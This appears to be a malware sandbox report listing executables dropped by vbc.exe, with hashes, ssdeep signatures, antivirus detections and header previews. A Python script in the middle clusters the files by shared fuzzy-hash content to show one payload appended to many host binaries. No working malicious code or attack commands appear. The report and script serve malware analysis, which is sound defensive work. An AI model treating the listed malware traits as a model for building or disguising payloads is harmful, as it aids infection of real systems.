SHA-512:DF80EC656F668D5F06C6D1CC2951F3A19A692D9E9E85E59BBDCA20C8B722A403506C42B38AEA9A97A172E0EC95F09E590E0B40E10E2F62F9ABD13AE187D54455
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1290240
Entropy (8bit):5.277782615464925
Encrypted:false
SSDEEP:12288:OImGUcsvZZdubv7hfl3dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:OxGBcmltsqjnhMgeiCl7G0nehbGZpbD
MD5:C0525CFD34E032B8DE30555E54329700
SHA1:335F38DD495A328453B3C0DBC7AF07E753CBE660
SHA-256:6A5784359D3CFF5FB8AEB767595945EAB50BA999BD15BB555041055008924CF9
SHA-512:DAE03F8345A6869AD3A07002F2BA072918F7A89AB8BBE1A460BC5EF4E11AE46D85A3A5B78312A06FCDBF09954D14329D775FC70CFA9D0B7A55E280D9EF48EFA1
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1644544
Entropy (8bit):5.694817171376491
Encrypted:false
SSDEEP:24576:K0vHyeLj8trn3ws/sqjnhMgeiCl7G0nehbGZpbD:7tj4rgsjDmg27RnWGj
MD5:9801C81A179DB8F89BCE1115C2F6A762
SHA1:F4E5609C671C41635E0425AD79563CBB8C17C87D
SHA-256:B3C73E830D550CFDB8C5527958B73C418D8B6FC9700B8ABEBF75673416E57811
SHA-512:ECCBFCB6AF6E78F6E4EA3C0E113242739B1C2770E36E6F6E5791F980F9FB247B4B30EAACDFE992C9D7ADCE76FB98ABE3E19CFB5ECB98713AE6ECEBFAA23027C0
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1781760
Entropy (8bit):7.279684404845038
Encrypted:false
SSDEEP:24576:soMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/Z6sqjnhMgeiCl7G0nehbGZpv:R4i0wGJra0uAUfkVy7/ZODmg27RnWGj
MD5:4DFD19E114CA56C2FB6E682C1F656921
SHA1:71DAE7E8BC4670DDE5BC404049015DC321FD91B4
SHA-256:4E7CF3FBFF9DF7EEE70BBFBD8D75D7FB36D3249A2F0D6D6973ABF8A0C7020EBC
SHA-512:384549CFCC2897BD4B6CFC1526D16F9C29919358ED61EA36DA9C092ABCF65F6F754B3782B4C3917602F410801E6632013F38D63DC750B0056B31238EE08ED8AC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1318400
Entropy (8bit):7.448782639181649
Encrypted:false
SSDEEP:24576:EeR0gB6axoCf0R6RLQRF/TzJqe58BimxsqjnhMgeiCl7G0nehbGZpbD:wgHxmR6uBTzge5MimFDmg27RnWGj
MD5:911C460C5787AA337B45595E27478B04
SHA1:E107D7187682A48A1629C7438BF2CD04D528BFB7
SHA-256:3EC595A206A2E3EF357B1FB55F90582A9623B67081B1BA71906CCD334379D2BA
SHA-512:D5CFB715027F359938C7AB777AB2A3EF41BEC36CF4AF8021332B349D07C6566CA8C1CA769B808252CAA33A7752D3DC1EA806183710A8D62AFDCF4FE1BE242F27
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446079873034151
Encrypted:false
SSDEEP:12288:2nEbH0j4x7R6SvyCMPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:2kwOtO7PsqjnhMgeiCl7G0nehbGZpbD
MD5:B67993E34F11133F7878DE841D83488D
SHA1:670885B3205484632B16F098EB626EA22856A5FE
SHA-256:1C2DA0484A91BD0506F7423559C1D37FC9326C76F183C9342A29E0B92CEB6941
SHA-512:6ED68A03878719ECE37FC77F5A48DDB50DE641CF408CC446B9914C87C395C855D3D1A08FF20947A142E5C8DC960E554BE1F84ADA63C2BB0FAB4E07BE426C20A3
Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......E.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                    Entropy (8bit):5.446836287935732
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:+nU/h/4K4sqjnhMgeiCl7G0nehbGZpbD:+U/VkDmg27RnWGj
                                                                                                                                                                    MD5:E8EC4D2A9C075AEBC6D14755C3E24786
                                                                                                                                                                    SHA1:627F5FCA9C291B29C1C4540CC793FF182475C842
                                                                                                                                                                    SHA-256:C2E03246B6B86978028D04D0233A0E333E9343F7DFDE9FE37863571F60C63F1C
                                                                                                                                                                    SHA-512:307E36F761A1ED49DCBBDEACA238EF64D933A96F44363B0B2EE88BF1A6189C142D3BCEB7D1BBEC2D9FC25328D1898E9E2E64F647FF7DE3C63B941634DBBCE1FC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......`........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                    Entropy (8bit):5.48375723428586
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qx71iBLZ05jNTmJWExDsqjnhMgeiCl7G0nehbGZpbD:qxhiHIjNgHDmg27RnWGj
                                                                                                                                                                    MD5:7C3244095778AC33F2176029B85B56D2
                                                                                                                                                                    SHA1:8A4E654AC5333EB5DBCAC0247E0F887A936F4BB0
                                                                                                                                                                    SHA-256:7CC0577797C0FEAE9E3D312A04B7EDF3B10CC4404979AF47FE1F6D23D23CE189
                                                                                                                                                                    SHA-512:8F8767462EA7995D9735151856996CB1B221F97119CDEB11FC8858556506CB34555A62A02B92133B13EDF268A8B3B173F92781DF5BF33C6B90B45AE17DF6135F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                    Entropy (8bit):5.466733690556043
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:9lnRklQ6fgJcEwixJsqjnhMgeiCl7G0nehbGZpbD:xoRfgJcEwCNDmg27RnWGj
                                                                                                                                                                    MD5:90CFC8EE41F54881D1E7FAF7293F9FFC
                                                                                                                                                                    SHA1:E4775A881A01ED34FD8FBF3C181BE790639322E5
                                                                                                                                                                    SHA-256:40CA0A868A6BA5DF749E63A29D39C43BC741816250FC634C964907B780A87F06
                                                                                                                                                                    SHA-512:C4333007B39B38FE6A139D389F67628FDF1CCA6A9C4E045E706B505173C634F3819082A0565BBB3440A819BC901BB28E81286FC206F3F8BDFC97AE117124853A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................h......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                    Entropy (8bit):5.496546902909799
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:VW25k8hb0Haw+x5sqjnhMgeiCl7G0nehbGZpbD:VWyk8SHawm9Dmg27RnWGj
                                                                                                                                                                    MD5:8C60FB5DC66CCE635B60AC783A3548F7
                                                                                                                                                                    SHA1:793B4109264D2EB4287411042926CD6EDAC6C301
                                                                                                                                                                    SHA-256:9956E14CE7FE037BAA534065FAADA476043811E423D55EC7FB2BF8E39C7D8F29
                                                                                                                                                                    SHA-512:2DA4AF2FAD4AEB1A42A24F03DD77345D5F65E5E405D0859CDFFF013F352F3BB61CDDD50DCAE73441C857EAE59DECA1AD2AE69090507A18D615A361DE6FCCBE48
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................J..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                    Entropy (8bit):5.1639687597000465
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:pWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:pKCKABBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4BF28DF7FCE57EF8E1C7E0A799600F17
                                                                                                                                                                    SHA1:93FC5D6B489CCE278BD29D5846901C2AC10CCD11
                                                                                                                                                                    SHA-256:E48216669A144CBFFB64DD7259A420CD73750D49EB1B2D6FEB9EE4DB254DCF46
                                                                                                                                                                    SHA-512:BECA291B5E43BFBE2D82D85D0B2133E0CEBD510E7C29958745A81C279B112A4865BC0961ECED82C0D585C6A3B5304EDCC1AF2106671F39BCF9FA70E9F1814DBE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................0G......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                    Entropy (8bit):5.162047335349573
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:UO7cCNWB+09IXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:hjNWBPmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:FF6F45B2AA38C60923ED246D390FB730
                                                                                                                                                                    SHA1:18FE1DE178D7CAEC232113D058A255F813439500
                                                                                                                                                                    SHA-256:9B3F94D697571406029A20581D341370567342A07AC4B2B9F7406CC225EAA26A
                                                                                                                                                                    SHA-512:793E901CD8E8637E39EF39BFADAF331190ED8B85FD67E27AAC4FB9337A8829309ADB2A1EB0C6EB607C21977E9360AA53188802523B51282DDC076D65F8EAE0D4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................h........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
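Every PE dropped by vbc.exe above has a different hash and size, yet each ssdeep signature ends in the same chunk (sqjnhMgeiCl7G0nehbGZpbD), which is the trace one expects when the same code has been appended to each host executable. The script below is an added triage example, not code from the report or from Joe Sandbox: it takes the seven complete entries listed above (labelled by the first 8 hex digits of their SHA-256), clusters them on shared ssdeep content, and extracts the common trailing chunk. The comparison rules are a simplified re-implementation of two real ssdeep behaviours (signatures are only comparable when block sizes are equal or differ by a factor of two, and chunks must share a 7-character substring before they count as related); the real edit-distance score is not reproduced, so use the ssdeep tool itself for scores.

```python
"""Cluster a sandbox report's dropped files by shared ssdeep content.

Added triage example, not part of the Joe Sandbox report. Entries are copied
from the report's dropped-file list; the block-size and 7-gram rules are a
simplified re-implementation of ssdeep's comparison prerequisites.
"""
from itertools import combinations

NGRAM = 7  # ssdeep refuses to score chunk pairs that share no 7-gram

# Constructed from the report's dropped-file entries: (SHA-256 prefix, size, ssdeep).
DROPPED = [
    ("1C2DA048", 1375232, "12288:2nEbH0j4x7R6SvyCMPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:2kwOtO7PsqjnhMgeiCl7G0nehbGZpbD"),
    ("C2E03246", 1375232, "24576:+nU/h/4K4sqjnhMgeiCl7G0nehbGZpbD:+U/VkDmg27RnWGj"),
    ("7CC05777", 1513984, "24576:qx71iBLZ05jNTmJWExDsqjnhMgeiCl7G0nehbGZpbD:qxhiHIjNgHDmg27RnWGj"),
    ("40CA0A86", 1419264, "24576:9lnRklQ6fgJcEwixJsqjnhMgeiCl7G0nehbGZpbD:xoRfgJcEwCNDmg27RnWGj"),
    ("9956E14C", 1522176, "24576:VW25k8hb0Haw+x5sqjnhMgeiCl7G0nehbGZpbD:VWyk8SHawm9Dmg27RnWGj"),
    ("E4821666", 1282048, "12288:pWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:pKCKABBsqjnhMgeiCl7G0nehbGZpbD"),
    ("9B3F94D6", 1228288, "12288:UO7cCNWB+09IXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:hjNWBPmsqjnhMgeiCl7G0nehbGZpbD"),
]


def parse_ssdeep(sig):
    """Split 'blocksize:chunk1:chunk2' into (int, str, str)."""
    bs, c1, c2 = sig.split(":", 2)
    return int(bs), c1, c2


def comparable_chunks(sig_a, sig_b):
    """Chunk pairs ssdeep would compare; empty if block sizes are too far apart."""
    bs_a, a1, a2 = parse_ssdeep(sig_a)
    bs_b, b1, b2 = parse_ssdeep(sig_b)
    if bs_a == bs_b:
        return [(a1, b1), (a2, b2)]
    if bs_a * 2 == bs_b:  # a's second chunk was computed at b's block size
        return [(a2, b1)]
    if bs_b * 2 == bs_a:
        return [(a1, b2)]
    return []


def longest_common_substring(a, b):
    """Plain DP over the two strings; returns the longest substring in both."""
    best_len, best_end, prev = 0, 0, [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                if cur[j] > best_len:
                    best_len, best_end = cur[j], i
        prev = cur
    return a[best_end - best_len:best_end]


def shared_content(sig_a, sig_b):
    """Longest substring shared by a comparable chunk pair, '' if under the 7-gram bar."""
    best = ""
    for ca, cb in comparable_chunks(sig_a, sig_b):
        lcs = longest_common_substring(ca, cb)
        if len(lcs) > len(best):
            best = lcs
    return best if len(best) >= NGRAM else ""


def cluster(entries):
    """Group labels whose signatures are transitively related (union-find)."""
    parent = {label: label for label, _, _ in entries}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for (la, _, sa), (lb, _, sb) in combinations(entries, 2):
        if shared_content(sa, sb):
            parent[find(la)] = find(lb)
    groups = {}
    for label, _, _ in entries:
        groups.setdefault(find(label), []).append(label)
    return sorted(groups.values(), key=len, reverse=True)


def chunk_at(sig, block_size):
    """The chunk of sig computed at block_size, or None if sig has none."""
    bs, c1, c2 = parse_ssdeep(sig)
    return c1 if bs == block_size else c2 if bs * 2 == block_size else None


def shared_tail(entries, block_size):
    """Suffix common to every entry's chunk at block_size: same end-of-file content."""
    chunks = [c for c in (chunk_at(s, block_size) for _, _, s in entries) if c]
    if not chunks:
        return ""
    n = min(len(c) for c in chunks)
    while n and len({c[-n:] for c in chunks}) > 1:
        n -= 1
    return chunks[0][-n:] if n else ""


if __name__ == "__main__":
    print("clusters:", cluster(DROPPED))
    print("common tail at block size 24576:", shared_tail(DROPPED, 24576))
```

Run as-is it reports a single cluster containing all seven files and the common tail sqjnhMgeiCl7G0nehbGZpbD at block size 24576. At block size 12288 only three entries have a chunk and their last characters differ, so shared_tail returns an empty string; a longer match between those three lives in the middle of the chunk, which shared_content will show for any pair. The AV hits on each file say nothing about which bytes are the host and which are the implant, so this kind of cross-file comparison is the quicker way to tell "one payload, many carriers" from seven independent binaries.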
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                    Entropy (8bit):5.238939900445129
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:9ihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:9ihsoRgDmg27RnWGj
                                                                                                                                                                    MD5:EF35580D4DDB60E9F39CB4B07294D552
                                                                                                                                                                    SHA1:AA4F369AB63EBBB1448B829CCA122B8CDBE6C5E7
                                                                                                                                                                    SHA-256:10EF5A60824A1C1EE5043F5AF65F6CD9479AE6E0B13C9D5F0BF06160FD503871
                                                                                                                                                                    SHA-512:13AD99309BB2A16F3A43184DA58DC9EEFCCAF77438D0617ACB1893306EE178CADF649CBD3A82707782834ED59A8182C2CEC17722FE0F5E1C965AA9D996DA18EC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                    Entropy (8bit):5.351018605211282
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:s1FDmRF+wpx/QafnsqjnhMgeiCl7G0nehbGZpbD:KmRF+wn/Jf7Dmg27RnWGj
                                                                                                                                                                    MD5:33C462812A8DCA0F7E481D691E6A30B7
                                                                                                                                                                    SHA1:7AD830A631722B7E2F1C240481A35639719B5BF5
                                                                                                                                                                    SHA-256:8CEDA8F27D7062A3CBABB189B2EF41D98DC482007506F75E9BB37D53AB7ACD91
                                                                                                                                                                    SHA-512:EC1A71EC61BDB3C55E9AF853DC39B1A86E7BCCEC3F20B261ED8D42DFC5F6A428FE350A3D855A94CA435FA584368060F6213F60B3FE5EE89402E528AD3CE5C376
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                    Entropy (8bit):5.162004797095016
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:A2Ae621B+0YaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:NE21BP9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:47114312142F204AE5B8469EBFE48F30
                                                                                                                                                                    SHA1:BBCD989FF7552C9AF41FE7E8090444933542099C
                                                                                                                                                                    SHA-256:0D9CD5CAE560DB57AF5769D7B1978E208C902C5E74683701F38A54B3FD155675
                                                                                                                                                                    SHA-512:F3A3B1A73E344EA988F5F338EB9B405A1A4A99F1565D75EA655A27338C80A275C7C2C741653BE8C5E4AD8BF9436ECC982DAF9A1E0A1645E565D14CFDA33B0B34
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                    Entropy (8bit):7.987638126345098
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:/ZkVX3lfrFfR0BecCqKBs+4o8YhA+Dmg27RnWGj:/qR1frZRpcTKX4kD527BWG
                                                                                                                                                                    MD5:6619FE6A64336993A22D0ECA85CB45F0
                                                                                                                                                                    SHA1:629CA777271C72F0B8D3F08516E4B52771B770A1
                                                                                                                                                                    SHA-256:D889D5E135CD6F6AA5A733DC3E8EEE151655245A3F8DE372D2C15BA564A062B0
                                                                                                                                                                    SHA-512:452FDCCEE219D03A65784B4C73F6272D20D155667F55121FF45B25DDBD36C0E029284DD4F103AC6E7B30D72386B684A258D36FE172970ED894C8FC6DE5F6035B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                    Entropy (8bit):7.987637526577778
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:5ZkVX3lfrFfR0BecCqKBs+4o8YhA+Dmg27RnWGj:5qR1frZRpcTKX4kD527BWG
                                                                                                                                                                    MD5:D47D028032DDD4F003D4A6E81336479C
                                                                                                                                                                    SHA1:843A9A0779C6219816575876E16213DD993DB3B0
                                                                                                                                                                    SHA-256:087B4B8396A8B38B68A809763E508CA85546D9B0E241D98C4C1B3762F086B22E
                                                                                                                                                                    SHA-512:124BE638B02A4E4FCA08D61172A2E1F0AAD4721B0028AB5B11EF900DA7021DD6FBDD8264DBAAE57A743619CFFFF308383CFF34E6193DC4A1C7BD20DFE90942D6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                    Entropy (8bit):5.068088983231046
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:3BXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:D571E056F9F5A9F735873A764AF451D3
                                                                                                                                                                    SHA1:EA810A74DBBCDD2F2904DCF9AE51E1ECB8F40F85
                                                                                                                                                                    SHA-256:9F5FAC6666AFA05C999B47DDE8B1DC87631D19C8585790C7D300ADE2623AD55B
                                                                                                                                                                    SHA-512:F6C579F23E6D6E86D7DA11A0DEED0020EA501FFBB957FB05C24D080C175B16386A144C4861AADD4672F09E8B6D0F26F5CC51B293D0B83EAA63679C2542D1CAB5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.03242858683778
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:hK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:U2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:37A71D5C2F7B4BD596983EA780B7DB67
                                                                                                                                                                    SHA1:C2958767FCAB3186CC48D6685703EB9D10213843
                                                                                                                                                                    SHA-256:9116B29C9BCF16EBBEF3E74F2AA440C16EDB31E3496C04F96C0EB8916F973E83
                                                                                                                                                                    SHA-512:DE1C4AC706888495CB300FAA4DD76F8C9DEB2B633E7C42FAE422840AA09EA025B4805EEF6335BC2B6CA62AC455883E8026841CCD7B57AB297085F5279584E5F9
                                                                                                                                                                    Malicious:true
